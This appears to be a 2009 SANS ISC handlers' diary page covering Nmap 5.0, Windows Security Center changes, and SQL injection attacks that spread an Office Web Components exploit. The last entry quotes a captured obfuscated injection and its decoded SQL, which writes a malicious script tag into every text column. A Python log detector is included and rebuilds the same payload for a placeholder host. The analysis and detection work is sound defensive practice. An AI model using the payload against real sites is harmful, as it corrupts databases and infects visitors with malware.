SANS ISC InfoSec Handlers Diary Blog



Nmap 5.0 released

Published: 2009-07-16
Last Updated: 2009-07-16 17:51:07 UTC
by Bojan Zdrnja (Version: 1)
1 comment(s)

One of the must-have tools for every person doing anything related to IT security is definitely Nmap (I mean, which other tool did Trinity use, besides an SSH exploit? And that one wasn't a fake SSH exploit like the one released a couple of days ago). The Nmap developers have worked hard on this latest version, which includes some very cool things like the Nmap Scripting Engine (NSE), which we even used to detect machines infected with the Conficker worm.

There are a lot of other neat new features and improvements, so don't wait and go to http://nmap.org/5/ to download your copy of Nmap.

--
Bojan

Keywords: nmap

Changes in Windows Security Center

Published: 2009-07-16
Last Updated: 2009-07-16 11:10:42 UTC
by Guy Bruneau (Version: 1)
1 comment(s)

An ISC reader wrote in about a change that occurred this month with the Windows Security Center (WSC): Microsoft expired the grace period that let vendors keep reporting AV, firewall or anti-spyware status to the WSC through the old API. The switch to the new WSC reporting API was not supposed to be enforced until September 2009. The new API is the result of an interface change introduced in Windows Vista SP1 and carried into Windows 7, replacing the API that shipped with Vista's original release.

If you are seeing a red shield in the bottom right corner, your Malware Protection tab may be indicating that your AV "is on but it is reporting its status to Windows Security Center in a format that is no longer supported. Use the program's automatic updating feature, or contact the program manufacturer for an updated version".

The grace period for updating to the new API, which reports the correct status to the WSC in Vista SP1, expired earlier than anticipated, causing confusion about whether your vendor's security software is protecting your PC.

This does not mean your AV, firewall or anti-spyware is not working and protecting your system, only that it can no longer report its status correctly through the WSC. Monitor the WSC status regularly to ensure your AV, firewall and anti-spyware are updated on schedule and functioning properly.

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot org

Teaching Comprehensive Packet Analysis in Ottawa, ON this coming September


OWC exploits used in SQL injection attacks

Published: 2009-07-16
Last Updated: 2009-07-16 08:38:21 UTC
by Bojan Zdrnja (Version: 1)
0 comment(s)

As we thought, it was just a matter of time before more attackers started exploiting the still unpatched Office Web Components vulnerability.

While a day ago reports of exploits for this vulnerability were still a bit rare, yesterday Ken Hoover sent us a log of an SQL injection attempt against his web site. The attempt looks very much like the ones we've been seeing for months – the attacker blindly tries to inject obfuscated SQL code:

';DECLARE @S NVARCHAR(4000);
SET @S=CAST(0x44004500430…F007200 AS NVARCHAR(4000));
EXEC(@S);

After deobfuscation of the CAST function input, the following SQL code is revealed:

DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
  select a.name,b.name from sysobjects a,syscolumns b
  where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
  exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=hxxp://f1y.in/j.js></script>''')
  FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

As you can see, they are injecting script code pointing to f1y.in, a known bad domain. That script contains links to two other web sites (www.jatrja.com and js.tongji.linezing.com) serving malicious JavaScript which, besides exploits for some older vulnerabilities, also includes the exploit for the OWC vulnerability.
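The CAST() obfuscation above is cheap to unpick in a log pipeline, because an NVARCHAR literal is plain UTF-16LE: the first bytes of the payload, 0x4400 0x4500 0x4300, spell "DEC". The following Python is an added example for this diary, not the diary's own code and not Ken Hoover's log. It constructs two Apache-style access log lines (one carrying a hex-encoded payload of the same shape as the one quoted above, aimed at the placeholder host malicious.example, and one ordinary request), URL-decodes them, decodes the hex back to SQL, pulls out the host of any injected <script src=...> tag, and flags the sysobjects/syscolumns cursor that turns a single injection into a rewrite of every text column in the database.

```python
"""Find and decode hex-encoded CAST() SQL injection payloads in web server logs.

Added example for this diary (not the diary's own code and not Ken Hoover's log).
The log lines and the payload host (malicious.example) are constructed.
"""
import re
from urllib.parse import unquote

# The injection shape quoted in the diary:
#   DECLARE @S NVARCHAR(n);SET @S=CAST(0x... AS NVARCHAR(n));EXEC(@S)
CAST_PAYLOAD = re.compile(
    r"DECLARE\s+@(\w+)\s+NVARCHAR\(\d+\)\s*;?\s*"
    r"SET\s+@\1\s*=\s*CAST\(0x([0-9A-Fa-f]+)\s+AS\s+NVARCHAR\(\d+\)\)\s*;?\s*"
    r"EXEC\(@\1\)",
    re.IGNORECASE,
)
# Host of any <script src=...> tag the decoded SQL tries to append to table data
SCRIPT_SRC_HOST = re.compile(r"<script\s+src=[\"']?(?:\w+://)?([^/\s>\"']+)", re.IGNORECASE)
# A cursor over sysobjects/syscolumns followed by an UPDATE: every text column gets rewritten
MASS_UPDATE = re.compile(r"\bCURSOR\b.*\bsysobjects\b.*\bupdate\b", re.IGNORECASE | re.DOTALL)


def decode_cast_hex(hexstr):
    """An NVARCHAR literal is UTF-16LE, so 0x4400 0x4500 0x4300 decodes to 'DEC'."""
    return bytes.fromhex(hexstr).decode("utf-16-le", errors="replace")


def analyse_request(line):
    """Return None for a clean log line, else a finding carrying the decoded SQL."""
    # Web servers log the query string URL-encoded; undo that before matching.
    m = CAST_PAYLOAD.search(unquote(line))
    if not m:
        return None
    sql = decode_cast_hex(m.group(2))
    return {
        "src_ip": line.split(" ", 1)[0],
        "declared_var": "@" + m.group(1),
        "decoded_sql": sql,
        "script_hosts": sorted(set(SCRIPT_SRC_HOST.findall(sql))),
        "mass_update": bool(MASS_UPDATE.search(sql)),
    }


def scan_log(lines):
    """Run analyse_request over every line and keep the hits."""
    return [f for f in map(analyse_request, lines) if f is not None]


# --- constructed sample input -------------------------------------------------
# Same structure as the deobfuscated SQL in the diary, pointing at a placeholder host.
CONSTRUCTED_SQL = (
    "DECLARE @T varchar(255),@C varchar(255) "
    "DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b "
    "where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) "
    "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN "
    "exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))"
    "+''<script src=hxxp://malicious.example/j.js></script>''') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)
# Encode it the way the injected request does (UTF-16LE hex) so the detector has real work to do.
CONSTRUCTED_HEX = CONSTRUCTED_SQL.encode("utf-16-le").hex().upper()

SAMPLE_LOG = [
    # constructed: the injection attempt as an Apache-style access log would record it
    '10.0.0.5 - - [15/Jul/2009:13:02:11 +0000] "GET /news.asp?id=1%27%3BDECLARE%20%40S%20NVARCHAR%284000%29%3B'
    'SET%20%40S%3DCAST%280x' + CONSTRUCTED_HEX + '%20AS%20NVARCHAR%284000%29%29%3BEXEC%28%40S%29 HTTP/1.1" 200 5120',
    # constructed: an ordinary request that must not be flagged
    '10.0.0.6 - - [15/Jul/2009:13:02:12 +0000] "GET /news.asp?id=42 HTTP/1.1" 200 3044',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["src_ip"], finding["declared_var"], finding["script_hosts"],
              "mass_update=%s" % finding["mass_update"])
        print(finding["decoded_sql"])
```

Matching on the DECLARE/CAST/EXEC skeleton rather than on the hex string itself is what keeps the check useful: the encoded bytes change with every campaign, the shape does not. The script_hosts field is the part worth feeding into a blocklist review, and mass_update is the reason to go and grep the database for injected script tags rather than treating the hit as a failed probe.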

The exploits end up downloading a Trojan (of course, what else) which currently has pretty bad detection (VT link) – only 15 AV programs detect it, though luckily some major AV vendors are among them.

If you haven't set those killbits yet, be sure that you do now, because the number of sites exploiting this vulnerability will probably rise exponentially soon.

--
Bojan
